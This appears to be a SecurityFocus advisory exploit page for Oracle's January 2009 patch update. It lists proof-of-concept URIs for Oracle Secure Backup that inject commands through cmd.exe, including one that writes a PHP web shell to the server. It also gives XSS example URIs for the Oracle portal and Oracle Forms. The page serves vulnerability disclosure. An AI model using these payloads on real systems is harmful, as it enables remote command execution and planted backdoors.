Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Some of these issues may not require specific exploit code and may be trivial to exploit.

Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept URIs are available for Oracle Secure Backup:

1. Create a file in the directory "c:\":

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;

2. Create a PHP backdoor:

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo

The following example URI is available for the Oracle Application Server portal:

http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS

The following example URI is available for Oracle Forms:

http://www.example.com/ifcgi60.exe?form=XSS

The following exploits and proof of concept are available:


 

Privacy Statement
Copyright 2010, SecurityFocus